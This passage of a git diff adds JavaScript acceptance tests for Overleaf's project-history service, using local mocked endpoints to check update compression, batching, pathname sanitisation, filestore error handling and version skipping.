'\0', // null byte to make this a binary file + ].join('\n') + + const stubHash = crypto + .createHash('sha1') + .update('blob ' + Buffer.byteLength(stubContents) + '\x00') + .update(stubContents, 'utf8') + .digest('hex') + + const stub = { + id: file.id, + pathname: file.pathname, + contents: stubContents, + hash: stubHash, + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(200, file.contents) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${stub.hash}`, stub.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(stub, this.userId, this.timestamp, stub.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + assert( + createBlob.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + done() + } + ) + }) + + it('should handle comment ops', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olUpdate(this.doc, this.userId, this.timestamp, [ + olTextOperation(this.doc, [3, '\nc', 2]), + olAddCommentOperation(this.doc, 'comment-id-1', 3, 2), + ]), + olUpdate( + this.doc, + this.userId, + this.timestamp, + [olAddCommentOperation(this.doc, 'comment-id-2', 2, 1)], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, i: '\nc' }, + { p: 3, c: 
'\nc', t: 'comment-id-1' }, + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 2, c: 'b', t: 'comment-id-2' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should be able to process lots of updates in batches', function (done) { + const BATCH_SIZE = 500 + const createFirstChangeBatch = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + ['a'.repeat(BATCH_SIZE), 6], + BATCH_SIZE - 1 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + const createSecondChangeBatch = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + ['a'.repeat(50), BATCH_SIZE + 6], + BATCH_SIZE - 1 + 50 + ), + ]) + return true + }) + .query({ end_version: 500 }) + .reply(204) + // these need mocking again for the second batch + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: BATCH_SIZE, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + + const pushChange = (n, cb) => { + this.doc.length += 1 + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, n, this.timestamp, [ + { p: 0, i: 'a' }, + ]), + cb + ) + } + + async.series( + [ + cb => { + async.times(BATCH_SIZE + 50, pushChange, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createFirstChangeBatch.isDone(), + `/api/projects/${historyId}/changes should have been called for the first batch` + ) + assert( + createSecondChangeBatch.isDone(), + `/api/projects/${historyId}/changes should have been called for the second batch` + ) + done() + } + ) + }) + }) + + describe('compressing updates', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should concat adjacent text updates', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [3, 'foobaz', 2], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, i: 'foobar' }, + { p: 6, d: 'bar' }, + ] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 6, i: 'baz' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + 
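+        // by this point the two raw updates above (insert 'foobar' plus
+        // delete 'bar', then insert 'baz') should have been compressed into
+        // the single text operation [3, 'foobaz', 2] asserted by the mock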
error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should take the timestamp of the first update', function (done) { + const timestamp1 = new Date(this.timestamp) + const timestamp2 = new Date(this.timestamp.getTime() + 10000) + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + timestamp1, + [3, 'foobaz', 2], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 1, timestamp1, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 2, timestamp2, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat updates more than 60 seconds apart', function (done) { + const timestamp1 = new Date(this.timestamp) + const timestamp2 = new Date(this.timestamp.getTime() + 120000) + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, this.userId, timestamp1, [3, 'foo', 2], 1), + olTextUpdate(this.doc, this.userId, timestamp2, [6, 'baz', 2], 2), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 1, timestamp1, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, this.userId, 2, timestamp2, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat updates with different user_ids', function (done) { + const userId1 = new ObjectId().toString() + const userId2 = new ObjectId().toString() + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, userId1, this.timestamp, [3, 'foo', 2], 1), + olTextUpdate(this.doc, userId2, this.timestamp, [6, 'baz', 2], 2), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, userId1, 1, this.timestamp, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, this.doc, userId2, 2, this.timestamp, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + 
`/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat updates with different docs', function (done) { + const doc1 = { + id: new ObjectId().toString(), + pathname: '/doc1.tex', + length: 10, + } + const doc2 = { + id: new ObjectId().toString(), + pathname: '/doc2.tex', + length: 10, + } + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(doc1, this.userId, this.timestamp, [3, 'foo', 7], 1), + olTextUpdate(doc2, this.userId, this.timestamp, [6, 'baz', 4], 2), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, doc1, this.userId, 1, this.timestamp, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, doc2, this.userId, 2, this.timestamp, [ + { p: 6, i: 'baz' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not send updates without any ops', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + // These blank ops can get sent by doc-updater on setDocs from Dropbox that don't change anything + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + !createChange.isDone(), + `/api/projects/${historyId}/changes should not have been called` + ) + done() + } + ) + }) + + it('should not send ops that compress to nothing', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [{ i: 'foo', p: 3 }] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ d: 'foo', p: 3 }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + !createChange.isDone(), + `/api/projects/${historyId}/changes should not have been called` + ) + done() + } + ) + }) + + it('should not send ops from a diff that are blank', function (done) { + this.doc.length = 300 + // Test case taken from a real life document where it was generating blank insert and + // delete ops from a diff, and the blank delete was erroring on the OL history from + // a text operation like [42, 0, 512], where the 0 was invalid. 
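+      // (in this encoding a positive number retains that many characters, a
+      // string inserts, and a negative number deletes, so the zero-length
+      // retain in [42, 0, 512] could never be applied)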
+ const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdates(this.doc, this.userId, this.timestamp, [ + [ + 87, + -1, + 67, + '|l|ll|}\n\\hline', + -4, + 30, + ' \\hline', + 87, + ' \\\\ \\hline', + 24, + ], + ]), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { + p: 73, + d: '\\begin{table}[h]\n\\centering\n\\caption{My caption}\n\\label{my-label}\n\\begin{tabular}{lll}\n & A & B \\\\\nLiter t up & 2 & 1 \\\\\nLiter Whiskey & 1 & 2 \\\\\nPris pr. liter & 200 & 250\n\\end{tabular}\n\\end{table}', + }, + { + p: 73, + i: '\\begin{table}[]\n\\centering\n\\caption{My caption}\n\\label{my-label}\n\\begin{tabular}{|l|ll|}\n\\hline\n & A & B \\\\ \\hline\nLiter t up & 2 & 1 \\\\\nLiter Whiskey & 1 & 2 \\\\\nPris pr. liter & 200 & 250 \\\\ \\hline\n\\end{tabular}\n\\end{table}', + }, + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not concat text updates across project structure ops', function (done) { + const newDoc = { + id: new ObjectId().toString(), + pathname: '/main.tex', + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + docLines: 'a\nb', + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${newDoc.hash}`) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [3, 'foo', 2], + 1 + ), + olAddDocUpdate(newDoc, this.userId, this.timestamp, newDoc.hash), + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [6, 'baz', 2], + 2 + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, i: 'foobar' }, + { p: 6, d: 'bar' }, + ] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + newDoc, + this.userId, + this.timestamp, + newDoc.docLines + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 6, i: 'baz' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should track the doc length when splitting ops', function (done) { + this.doc.length = 10 + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, this.userId, this.timestamp, [3, -3, 4], 1), + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [3, 'barbaz', 4], + 2 + ), // This has a base length of 10 + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + 
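+              // the delete and insert below are split into separate changes:
+              // the delete keeps the base length of 10, but the insert that
+              // follows must be sized against the post-delete length of 7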
ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [ + { p: 3, d: 'foo' }, + { p: 3, i: 'bar' }, // Make sure the length of the op generated from this is 7, not 10 + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 2, + this.timestamp, + [{ p: 6, i: 'baz' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('with bad pathnames', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should replace \\ with _ and workaround * in pathnames', function (done) { + const doc = { + id: this.doc.id, + pathname: '\\main.tex', + hash: 'b07b6b7a27667965f733943737124395c7577bea', + docLines: 'aaabbbccc', + length: 9, + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${doc.hash}`) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate( + { id: doc.id, pathname: '_main.tex' }, + this.userId, + this.timestamp, + doc.hash + ), + olRenameUpdate( + { id: doc.id, pathname: '_main.tex' }, + this.userId, + this.timestamp, + '_main.tex', + '_main2.tex' + ), + olTextUpdate( + { id: doc.id, pathname: '_main2.tex' }, + this.userId, + this.timestamp, + [3, 'foo', 6], + 2 + ), + olRenameUpdate( + { id: doc.id, pathname: '_main2.tex' }, + this.userId, + this.timestamp, + '_main2.tex', + '_main__ASTERISK__.tex' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + doc, + this.userId, + this.timestamp, + doc.docLines + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + doc, + this.userId, + this.timestamp, + '/\\main.tex', + '/\\main2.tex' + ), + cb + ) + doc.pathname = '\\main2.tex' + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate(historyId, doc, this.userId, 2, this.timestamp, [ + { p: 3, i: 'foo' }, + ]), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + doc, + this.userId, + this.timestamp, + '/\\main2.tex', + '/\\main*.tex' + ), + cb + ) + doc.pathname = '\\main*.tex' + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should workaround pathnames beginning with spaces', function (done) { + const doc = { + id: this.doc.id, + pathname: 'main.tex', + hash: 'b07b6b7a27667965f733943737124395c7577bea', + docLines: 'aaabbbccc', + length: 9, + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${doc.hash}`) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate( + { id: 
doc.id, pathname: 'main.tex' }, + this.userId, + this.timestamp, + doc.hash + ), + olRenameUpdate( + { id: doc.id }, + this.userId, + this.timestamp, + 'main.tex', + 'foo/__SPACE__main.tex' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + doc, + this.userId, + this.timestamp, + doc.docLines + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + doc, + this.userId, + this.timestamp, + '/main.tex', + '/foo/ main.tex' + ), + cb + ) + doc.pathname = '/foo/ main.tex' + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('with bad response from filestore', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should return a 500 if the filestore returns a 500', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(500) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${file.hash}`, file.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject( + this.projectId, + { allowErrors: true }, + (error, res) => { + if (error) { + return cb(error) + } + expect(res.statusCode).to.equal(500) + cb() + } + ) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + assert( + !createBlob.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + done() + } + ) + }) + + it('should return a 500 if the filestore request errors', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .replyWithError('oh no!') + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${file.hash}`, file.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + 
async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject( + this.projectId, + { allowErrors: true }, + (error, res) => { + if (error) { + return cb(error) + } + expect(res.statusCode).to.equal(500) + cb() + } + ) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + assert( + !createBlob.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/latest/files should not have been called` + ) + done() + } + ) + }) + }) + + describe('with an existing projectVersion field', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: { projectVersion: '100.0' }, + changes: [], + }, + }, + }) + }) + + it('should discard project structure updates which have already been applied', function (done) { + const newDoc = [] + for (let i = 0; i <= 2; i++) { + newDoc[i] = { + id: new ObjectId().toString(), + pathname: `/main${i}.tex`, + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + docLines: 'a\nb', + } + } + + MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${newDoc[0].hash}`) + .times(3) + .reply(201) + + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdateWithVersion( + newDoc[1], + this.userId, + this.timestamp, + newDoc[1].hash, + '101.0' + ), + olAddDocUpdateWithVersion( + newDoc[2], + this.userId, + this.timestamp, + newDoc[2].hash, + '102.0' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdateWithVersion( + historyId, + newDoc[0], + this.userId, + this.timestamp, + newDoc[0].docLines, + '100.0' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdateWithVersion( + historyId, + newDoc[1], + this.userId, + this.timestamp, + newDoc[1].docLines, + '101.0' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdateWithVersion( + historyId, + newDoc[2], + this.userId, + this.timestamp, + newDoc[2].docLines, + '102.0' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('with an existing docVersions field', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: { v2DocVersions: { [this.doc.id]: { v: 100 } } }, // version 100 below already applied + changes: [], + }, + }, + }) + }) + + it('should discard doc updates which have already been applied', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate( + this.doc, + this.userId, + this.timestamp, + [6, 'baz', 2], + 101 + ), + ]) + return true + }) + 
.query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 100, + this.timestamp, + [ + { p: 3, i: 'foobar' }, // these ops should be skipped + { p: 6, d: 'bar' }, + ] + ), + cb + ) + this.doc.length += 3 + }, + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 101, + this.timestamp, + [ + { p: 6, i: 'baz' }, // this op should be applied + ] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/SummarisedUpdatesTests.js b/services/project-history/test/acceptance/js/SummarisedUpdatesTests.js new file mode 100644 index 0000000..5e8b57e --- /dev/null +++ b/services/project-history/test/acceptance/js/SummarisedUpdatesTests.js @@ -0,0 +1,249 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import sinon from 'sinon' +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('Summarized updates', function () { + beforeEach(function (done) { + this.projectId = new ObjectId().toString() + this.historyId = new ObjectId().toString() + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + return ProjectHistoryClient.initializeProject( + this.historyId, + (error, olProject) => { + if (error != null) { + throw error + } + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: olProject.id } }, + }) + + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/3/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + + return done() + } + ) + }) + }) + + afterEach(function () { + return nock.cleanAll() + }) + + it('should return the latest summarized updates from a single chunk', function (done) { + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { min_count: 1 }, + (error, updates) => { + if (error != null) { + 
throw error + } + expect(updates).to.deep.equal({ + nextBeforeTimestamp: 6, + updates: [ + { + fromV: 6, + toV: 8, + meta: { + users: ['5a5637efdac84e81b71014c4', 31], + start_ts: 1512383567277, + end_ts: 1512383572877, + }, + pathnames: ['bar.tex', 'main.tex'], + project_ops: [], + labels: [], + }, + ], + }) + return done() + } + ) + }) + + it('should return the latest summarized updates, with min_count spanning multiple chunks', function (done) { + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { min_count: 5 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates).to.deep.equal({ + updates: [ + { + fromV: 6, + toV: 8, + meta: { + users: ['5a5637efdac84e81b71014c4', 31], + start_ts: 1512383567277, + end_ts: 1512383572877, + }, + pathnames: ['bar.tex', 'main.tex'], + project_ops: [], + labels: [], + }, + { + fromV: 5, + toV: 6, + meta: { + users: [31], + start_ts: 1512383366120, + end_ts: 1512383366120, + }, + pathnames: [], + project_ops: [ + { + atV: 5, + rename: { + pathname: 'foo.tex', + newPathname: 'bar.tex', + }, + }, + ], + labels: [], + }, + { + fromV: 2, + toV: 5, + meta: { + users: [31], + start_ts: 1512383313724, + end_ts: 1512383362905, + }, + pathnames: ['foo.tex'], + project_ops: [], + labels: [], + }, + { + fromV: 